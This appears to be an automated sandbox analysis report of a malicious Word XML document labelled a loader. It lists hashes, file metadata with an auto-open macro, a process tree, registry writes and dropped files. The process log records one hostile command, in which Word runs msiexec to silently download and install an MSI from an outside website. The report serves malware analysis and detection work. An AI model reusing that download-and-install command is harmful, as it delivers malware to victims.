| File name: | ac1b391230816b46484610a4b474eb4d0996eef57b0a147f341297204cd191f0 |
| Full analysis: | https://app.any.run/tasks/569bcfaa-8cfa-40f7-a55c-7b3600f1872d |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | November 08, 2018, 06:53:11 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/xml |
| File info: | XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators |
| MD5: | D3265BF4490965C523CFD235990E2DE3 |
| SHA1: | DBF3A4E9DDE6100B521827D71354C57093FFE0BD |
| SHA256: | AC1B391230816B46484610A4B474EB4D0996EEF57B0A147F341297204CD191F0 |
| SSDEEP: | 3072:eI3HHjWUU38bONpQYDmbmvDuBUKTrXraCtHlpORaAs/vUEMVXpKxq:tjWUNONNrSBUKTrOwl0hsXUEM9b |
| .xml | | | Microsoft Office XML Flat File Format Word Document (ASCII) (43.7) |
|---|---|---|
| .rels | | | Open Office XML Relationships (28.2) |
| .xml | | | Microsoft Office XML Flat File Format (ASCII) (20.8) |
| .svg | | | Scalable Vector Graphics (var.3) (4.5) |
| .xml | | | Generic XML (ASCII) (1.5) |
| PackagePartName: | /_rels/.rels |
|---|---|
| PackagePartContentType: | application/vnd.openxmlformats-package.relationships+xml |
| PackagePartPadding: | 512 |
| PackagePartXmlDataRelationshipsXmlns: | http://schemas.openxmlformats.org/package/2006/relationships |
| PackagePartXmlDataRelationshipsRelationshipId: | rId3 |
| PackagePartXmlDataRelationshipsRelationshipType: | http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties |
| PackagePartXmlDataRelationshipsRelationshipTarget: | docProps/app.xml |
| PackagePartXmlDataDocumentIgnorable: | w14 w15 w16se w16cid wp14 |
| PackagePartXmlDataDocumentBodyPRsidR: | 00380709 |
| PackagePartXmlDataDocumentBodyPRsidRDefault: | 00380709 |
| PackagePartXmlDataDocumentBodyPBookmarkStartId: | - |
| PackagePartXmlDataDocumentBodyPBookmarkStartName: | _GoBack |
| PackagePartXmlDataDocumentBodyPBookmarkEndId: | - |
| PackagePartXmlDataDocumentBodyPRRPrNoProof: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorDistT: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorDistB: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorDistL: | 114300 |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorDistR: | 114300 |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorSimplePos: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorRelativeHeight: | 251658240 |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorBehindDoc: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorLocked: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorLayoutInCell: | 1 |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorAllowOverlap: | 1 |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorSimplePosX: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorSimplePosY: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorPositionHRelativeFrom: | column |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorPositionHPosOffset: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorPositionVRelativeFrom: | paragraph |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorPositionVPosOffset: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorExtentCx: | 4649492 |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorExtentCy: | 4649492 |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorEffectExtentL: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorEffectExtentT: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorEffectExtentR: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorEffectExtentB: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorWrapNone: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorDocPrId: | 1 |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorDocPrName: | Picture 1 |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorCNvGraphicFramePr: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataUri: | http://schemas.openxmlformats.org/drawingml/2006/picture |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicNvPicPrCNvPrId: | 1 |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicNvPicPrCNvPrName: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicNvPicPrCNvPicPr: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicBlipFillBlipEmbed: | rId5 |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicBlipFillBlipExtLstExtUri: | {28A0092B-C50C-407E-A947-70E740481C1C} |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicBlipFillBlipExtLstExtUseLocalDpiVal: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicBlipFillStretchFillRect: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrXfrmOffX: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrXfrmOffY: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrXfrmExtCx: | 4649492 |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrXfrmExtCy: | 4649492 |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrPrstGeomPrst: | rect |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrPrstGeomAvLst: | - |
| PackagePartXmlDataDocumentBodySectPrRsidR: | 00380709 |
| PackagePartXmlDataDocumentBodySectPrPgSzW: | 12240 |
| PackagePartXmlDataDocumentBodySectPrPgSzH: | 15840 |
| PackagePartXmlDataDocumentBodySectPrPgMarTop: | 1440 |
| PackagePartXmlDataDocumentBodySectPrPgMarRight: | 1440 |
| PackagePartXmlDataDocumentBodySectPrPgMarBottom: | 1440 |
| PackagePartXmlDataDocumentBodySectPrPgMarLeft: | 1440 |
| PackagePartXmlDataDocumentBodySectPrPgMarHeader: | 720 |
| PackagePartXmlDataDocumentBodySectPrPgMarFooter: | 720 |
| PackagePartXmlDataDocumentBodySectPrPgMarGutter: | - |
| PackagePartXmlDataDocumentBodySectPrColsSpace: | 720 |
| PackagePartXmlDataDocumentBodySectPrDocGridLinePitch: | 360 |
| PackagePartBinaryData: | (Binary data 46942 bytes, use -b option to extract) |
| PackagePartCompression: | store |
| PackagePartXmlDataThemeName: | Office Theme |
| PackagePartXmlDataThemeThemeElementsClrSchemeName: | Office |
| PackagePartXmlDataThemeThemeElementsClrSchemeDk1SysClrVal: | windowText |
| PackagePartXmlDataThemeThemeElementsClrSchemeDk1SysClrLastClr: | 000000 |
| PackagePartXmlDataThemeThemeElementsClrSchemeLt1SysClrVal: | window |
| PackagePartXmlDataThemeThemeElementsClrSchemeLt1SysClrLastClr: | FFFFFF |
| PackagePartXmlDataThemeThemeElementsClrSchemeDk2SrgbClrVal: | 44546A |
| PackagePartXmlDataThemeThemeElementsClrSchemeLt2SrgbClrVal: | E7E6E6 |
| PackagePartXmlDataThemeThemeElementsClrSchemeAccent1SrgbClrVal: | 4472C4 |
| PackagePartXmlDataThemeThemeElementsClrSchemeAccent2SrgbClrVal: | ED7D31 |
| PackagePartXmlDataThemeThemeElementsClrSchemeAccent3SrgbClrVal: | A5A5A5 |
| PackagePartXmlDataThemeThemeElementsClrSchemeAccent4SrgbClrVal: | FFC000 |
| PackagePartXmlDataThemeThemeElementsClrSchemeAccent5SrgbClrVal: | 5B9BD5 |
| PackagePartXmlDataThemeThemeElementsClrSchemeAccent6SrgbClrVal: | 70AD47 |
| PackagePartXmlDataThemeThemeElementsClrSchemeHlinkSrgbClrVal: | 0563C1 |
| PackagePartXmlDataThemeThemeElementsClrSchemeFolHlinkSrgbClrVal: | 954F72 |
| PackagePartXmlDataThemeThemeElementsFontSchemeName: | Office |
| PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontLatinTypeface: | Calibri Light |
| PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontLatinPanose: | 020F0302020204030204 |
| PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontEaTypeface: | - |
| PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontCsTypeface: | - |
| PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontFontScript: | Jpan |
| PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontFontTypeface: | 游ゴシック Light |
| PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontLatinTypeface: | Calibri |
| PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontLatinPanose: | 020F0502020204030204 |
| PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontEaTypeface: | - |
| PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontCsTypeface: | - |
| PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontFontScript: | Jpan |
| PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontFontTypeface: | 游明朝 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeName: | Office |
| PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstSolidFillSchemeClrVal: | phClr |
| PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillRotWithShape: | 1 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsPos: | - |
| PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrVal: | phClr |
| PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrLumModVal: | 110000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrSatModVal: | 105000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrTintVal: | 67000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillLinAng: | 5400000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillLinScaled: | - |
| PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrShadeVal: | 100000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnW: | 6350 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnCap: | flat |
| PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnCmpd: | sng |
| PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnAlgn: | ctr |
| PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnSolidFillSchemeClrVal: | phClr |
| PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnPrstDashVal: | solid |
| PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnMiterLim: | 800000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLst: | - |
| PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwBlurRad: | 57150 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwDist: | 19050 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwDir: | 5400000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwAlgn: | ctr |
| PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwRotWithShape: | - |
| PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwSrgbClrVal: | 000000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwSrgbClrAlphaVal: | 63000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstSolidFillSchemeClrVal: | phClr |
| PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstSolidFillSchemeClrTintVal: | 95000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstSolidFillSchemeClrSatModVal: | 170000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillRotWithShape: | 1 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsPos: | - |
| PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrVal: | phClr |
| PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrTintVal: | 93000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrSatModVal: | 150000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrShadeVal: | 98000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrLumModVal: | 102000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillLinAng: | 5400000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillLinScaled: | - |
| PackagePartXmlDataThemeObjectDefaults: | - |
| PackagePartXmlDataThemeExtraClrSchemeLst: | - |
| PackagePartXmlDataThemeExtLstExtUri: | {05A4C25C-085E-4340-85A3-A5531E510DB2} |
| PackagePartXmlDataThemeExtLstExtThemeFamilyName: | Office Theme |
| PackagePartXmlDataThemeExtLstExtThemeFamilyId: | {62F939B6-93AF-4DB8-9C6B-D6C7DFDC589F} |
| PackagePartXmlDataThemeExtLstExtThemeFamilyVid: | {4A3C46E8-61CC-4603-A589-7422A47A8E4A} |
| PackagePartXmlDataVbaSuppDataIgnorable: | w14 w15 w16se w16cid wp14 |
| PackagePartXmlDataVbaSuppDataDocEventsEventDocOpen: | - |
| PackagePartXmlDataVbaSuppDataMcdsMcdMacroName: | PROJECT.FVUD6UVDCPAIB5HGWC.S7FS5W_GWZDOIQ4UERQA |
| PackagePartXmlDataVbaSuppDataMcdsMcdName: | Project.fVUd6uvDCPAiB5HGwC.S7Fs5W_GWzdOIQ4ueRqa |
| PackagePartXmlDataVbaSuppDataMcdsMcdBEncrypt: | 00 |
| PackagePartXmlDataVbaSuppDataMcdsMcdCmg: | 56 |
| PackagePartXmlDataSettingsIgnorable: | w14 w15 w16se w16cid |
| PackagePartXmlDataSettingsZoomPercent: | 100 |
| PackagePartXmlDataSettingsDefaultTabStopVal: | 720 |
| PackagePartXmlDataSettingsCharacterSpacingControlVal: | doNotCompress |
| PackagePartXmlDataSettingsCompatCompatSettingName: | compatibilityMode |
| PackagePartXmlDataSettingsCompatCompatSettingUri: | http://schemas.microsoft.com/office/word |
| PackagePartXmlDataSettingsCompatCompatSettingVal: | 15 |
| PackagePartXmlDataSettingsRsidsRsidRootVal: | 00380709 |
| PackagePartXmlDataSettingsRsidsRsidVal: | 00380709 |
| PackagePartXmlDataSettingsMathPrMathFontVal: | Cambria Math |
| PackagePartXmlDataSettingsMathPrBrkBinVal: | before |
| PackagePartXmlDataSettingsMathPrBrkBinSubVal: | -- |
| PackagePartXmlDataSettingsMathPrSmallFracVal: | - |
| PackagePartXmlDataSettingsMathPrDispDef: | - |
| PackagePartXmlDataSettingsMathPrLMarginVal: | - |
| PackagePartXmlDataSettingsMathPrRMarginVal: | - |
| PackagePartXmlDataSettingsMathPrDefJcVal: | centerGroup |
| PackagePartXmlDataSettingsMathPrWrapIndentVal: | 1440 |
| PackagePartXmlDataSettingsMathPrIntLimVal: | subSup |
| PackagePartXmlDataSettingsMathPrNaryLimVal: | undOvr |
| PackagePartXmlDataSettingsThemeFontLangVal: | en-US |
| PackagePartXmlDataSettingsClrSchemeMappingBg1: | light1 |
| PackagePartXmlDataSettingsClrSchemeMappingT1: | dark1 |
| PackagePartXmlDataSettingsClrSchemeMappingBg2: | light2 |
| PackagePartXmlDataSettingsClrSchemeMappingT2: | dark2 |
| PackagePartXmlDataSettingsClrSchemeMappingAccent1: | accent1 |
| PackagePartXmlDataSettingsClrSchemeMappingAccent2: | accent2 |
| PackagePartXmlDataSettingsClrSchemeMappingAccent3: | accent3 |
| PackagePartXmlDataSettingsClrSchemeMappingAccent4: | accent4 |
| PackagePartXmlDataSettingsClrSchemeMappingAccent5: | accent5 |
| PackagePartXmlDataSettingsClrSchemeMappingAccent6: | accent6 |
| PackagePartXmlDataSettingsClrSchemeMappingHyperlink: | hyperlink |
| PackagePartXmlDataSettingsClrSchemeMappingFollowedHyperlink: | followedHyperlink |
| PackagePartXmlDataSettingsShapeDefaultsShapedefaultsExt: | edit |
| PackagePartXmlDataSettingsShapeDefaultsShapedefaultsSpidmax: | 1026 |
| PackagePartXmlDataSettingsShapeDefaultsShapelayoutExt: | edit |
| PackagePartXmlDataSettingsShapeDefaultsShapelayoutIdmapExt: | edit |
| PackagePartXmlDataSettingsShapeDefaultsShapelayoutIdmapData: | 1 |
| PackagePartXmlDataSettingsDecimalSymbolVal: | . |
| PackagePartXmlDataSettingsListSeparatorVal: | , |
| PackagePartXmlDataSettingsChartTrackingRefBased: | - |
| PackagePartXmlDataSettingsDocIdVal: | {D24C6EB6-1E40-4F8D-93E2-A1BBB0912DFA} |
| PackagePartXmlDataPropertiesXmlns: | http://schemas.openxmlformats.org/officeDocument/2006/extended-properties |
| PackagePartXmlDataPropertiesTemplate: | Normal |
| PackagePartXmlDataPropertiesTotalTime: | - |
| PackagePartXmlDataPropertiesPages: | 1 |
| PackagePartXmlDataPropertiesWords: | - |
| PackagePartXmlDataPropertiesCharacters: | 1 |
| PackagePartXmlDataPropertiesApplication: | Microsoft Office Word |
| PackagePartXmlDataPropertiesDocSecurity: | - |
| PackagePartXmlDataPropertiesLines: | 1 |
| PackagePartXmlDataPropertiesParagraphs: | 1 |
| PackagePartXmlDataPropertiesScaleCrop: | - |
| PackagePartXmlDataPropertiesCompany: | - |
| PackagePartXmlDataPropertiesLinksUpToDate: | - |
| PackagePartXmlDataPropertiesCharactersWithSpaces: | 1 |
| PackagePartXmlDataPropertiesSharedDoc: | - |
| PackagePartXmlDataPropertiesHyperlinksChanged: | - |
| PackagePartXmlDataPropertiesAppVersion: | 16 |
| PackagePartXmlDataStylesIgnorable: | w14 w15 w16se w16cid |
| PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsAsciiTheme: | minorHAnsi |
| PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsEastAsiaTheme: | minorHAnsi |
| PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsHAnsiTheme: | minorHAnsi |
| PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsCstheme: | minorBidi |
| PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrSzVal: | 22 |
| PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrSzCsVal: | 22 |
| PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrLangVal: | en-US |
| PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrLangEastAsia: | en-US |
| PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrLangBidi: | ar-SA |
| PackagePartXmlDataStylesDocDefaultsPPrDefaultPPrSpacingAfter: | 160 |
| PackagePartXmlDataStylesDocDefaultsPPrDefaultPPrSpacingLine: | 259 |
| PackagePartXmlDataStylesDocDefaultsPPrDefaultPPrSpacingLineRule: | auto |
| PackagePartXmlDataStylesLatentStylesDefLockedState: | - |
| PackagePartXmlDataStylesLatentStylesDefUIPriority: | 99 |
| PackagePartXmlDataStylesLatentStylesDefSemiHidden: | - |
| PackagePartXmlDataStylesLatentStylesDefUnhideWhenUsed: | - |
| PackagePartXmlDataStylesLatentStylesDefQFormat: | - |
| PackagePartXmlDataStylesLatentStylesCount: | 375 |
| PackagePartXmlDataStylesLatentStylesLsdExceptionName: | Normal |
| PackagePartXmlDataStylesLatentStylesLsdExceptionUiPriority: | - |
| PackagePartXmlDataStylesLatentStylesLsdExceptionQFormat: | 1 |
| PackagePartXmlDataStylesLatentStylesLsdExceptionSemiHidden: | 1 |
| PackagePartXmlDataStylesLatentStylesLsdExceptionUnhideWhenUsed: | 1 |
| PackagePartXmlDataStylesStyleType: | paragraph |
| PackagePartXmlDataStylesStyleDefault: | 1 |
| PackagePartXmlDataStylesStyleStyleId: | Normal |
| PackagePartXmlDataStylesStyleNameVal: | Normal |
| PackagePartXmlDataStylesStyleQFormat: | - |
| PackagePartXmlDataStylesStyleUiPriorityVal: | 1 |
| PackagePartXmlDataStylesStyleSemiHidden: | - |
| PackagePartXmlDataStylesStyleUnhideWhenUsed: | - |
| PackagePartXmlDataStylesStyleTblPrTblIndW: | - |
| PackagePartXmlDataStylesStyleTblPrTblIndType: | dxa |
| PackagePartXmlDataStylesStyleTblPrTblCellMarTopW: | - |
| PackagePartXmlDataStylesStyleTblPrTblCellMarTopType: | dxa |
| PackagePartXmlDataStylesStyleTblPrTblCellMarLeftW: | 108 |
| PackagePartXmlDataStylesStyleTblPrTblCellMarLeftType: | dxa |
| PackagePartXmlDataStylesStyleTblPrTblCellMarBottomW: | - |
| PackagePartXmlDataStylesStyleTblPrTblCellMarBottomType: | dxa |
| PackagePartXmlDataStylesStyleTblPrTblCellMarRightW: | 108 |
| PackagePartXmlDataStylesStyleTblPrTblCellMarRightType: | dxa |
| PackagePartXmlDataCorePropertiesTitle: | - |
| PackagePartXmlDataCorePropertiesSubject: | - |
| PackagePartXmlDataCorePropertiesCreator: | Central |
| PackagePartXmlDataCorePropertiesKeywords: | - |
| PackagePartXmlDataCorePropertiesDescription: | - |
| PackagePartXmlDataCorePropertiesLastModifiedBy: | Central |
| PackagePartXmlDataCorePropertiesRevision: | 1 |
| PackagePartXmlDataCorePropertiesCreatedType: | dcterms:W3CDTF |
| PackagePartXmlDataCorePropertiesCreated: | 2018:11:06 18:40:00Z |
| PackagePartXmlDataCorePropertiesModifiedType: | dcterms:W3CDTF |
| PackagePartXmlDataCorePropertiesModified: | 2018:11:06 18:40:00Z |
| PackagePartXmlDataFontsIgnorable: | w14 w15 w16se w16cid |
| PackagePartXmlDataFontsFontName: | Calibri |
| PackagePartXmlDataFontsFontPanose1Val: | 020F0502020204030204 |
| PackagePartXmlDataFontsFontCharsetVal: | 00 |
| PackagePartXmlDataFontsFontFamilyVal: | swiss |
| PackagePartXmlDataFontsFontPitchVal: | variable |
| PackagePartXmlDataFontsFontSigUsb0: | E0002AFF |
| PackagePartXmlDataFontsFontSigUsb1: | C000247B |
| PackagePartXmlDataFontsFontSigUsb2: | 00000009 |
| PackagePartXmlDataFontsFontSigUsb3: | 00000000 |
| PackagePartXmlDataFontsFontSigCsb0: | 000001FF |
| PackagePartXmlDataFontsFontSigCsb1: | 00000000 |
| PackagePartXmlDataWebSettingsIgnorable: | w14 w15 w16se w16cid |
| PackagePartXmlDataWebSettingsOptimizeForBrowser: | - |
| PackagePartXmlDataWebSettingsAllowPNG: | - |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 916 | msiexec.exe /i http://socaleights.com//images/2014/jzfdyijsh.msi /quiet | C:\Windows\system32\msiexec.exe | — | WINWORD.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 0 Version: 5.0.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1264 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\ac1b391230816b46484610a4b474eb4d0996eef57b0a147f341297204cd191f0.xml" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | MSOXMLED.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 1588 | "C:\Windows\Installer\MSI4F66.tmp" | C:\Windows\Installer\MSI4F66.tmp | MSI4F66.tmp | ||||||||||||
User: admin Company: 05becd92-1cea-493 Integrity Level: MEDIUM Description: 7686b9e3-e106-48c Exit code: 0 Version: 20.77.130.168 Modules
| |||||||||||||||
| 2192 | "C:\Windows\Installer\MSI4F66.tmp" | C:\Windows\Installer\MSI4F66.tmp | — | msiexec.exe | |||||||||||
User: admin Company: 05becd92-1cea-493 Integrity Level: MEDIUM Description: 7686b9e3-e106-48c Exit code: 0 Version: 20.77.130.168 Modules
| |||||||||||||||
| 2932 | C:\Windows\system32\msiexec.exe /V | C:\Windows\system32\msiexec.exe | services.exe | ||||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows® installer Exit code: 0 Version: 5.0.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3884 | "C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\Desktop\ac1b391230816b46484610a4b474eb4d0996eef57b0a147f341297204cd191f0.xml" | C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: XML Editor Exit code: 0 Version: 14.0.4750.1000 Modules
| |||||||||||||||
| (PID) Process: | (1264) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | ;~! |
Value: 3B7E2100F0040000010000000000000000000000 | |||
| (PID) Process: | (1264) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: Off | |||
| (PID) Process: | (1264) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: On | |||
| (PID) Process: | (3884) MSOXMLED.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | WORDFiles |
Value: 1298661393 | |||
| (PID) Process: | (1264) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | WORDFiles |
Value: 1298661394 | |||
| (PID) Process: | (1264) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1298661508 | |||
| (PID) Process: | (1264) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1298661509 | |||
| (PID) Process: | (1264) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
| Operation: | write | Name: | MTTT |
Value: F0040000927E0BC12F77D40100000000 | |||
| (PID) Process: | (1264) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | ;a! |
Value: 3B612100F004000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
| (PID) Process: | (1264) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | delete value | Name: | ;a! |
Value: 3B612100F004000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 1264 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR36AB.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 2932 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\~DF80A74F7450274096.TMP | — | |
MD5:— | SHA256:— | |||
| 2932 | msiexec.exe | C:\Config.Msi\184e2d.rbs | — | |
MD5:— | SHA256:— | |||
| 2932 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\~DF2E78471749F551A9.TMP | — | |
MD5:— | SHA256:— | |||
| 1588 | MSI4F66.tmp | C:\Users\admin\AppData\Roaming\F63AAA\A71D80.lck | — | |
MD5:— | SHA256:— | |||
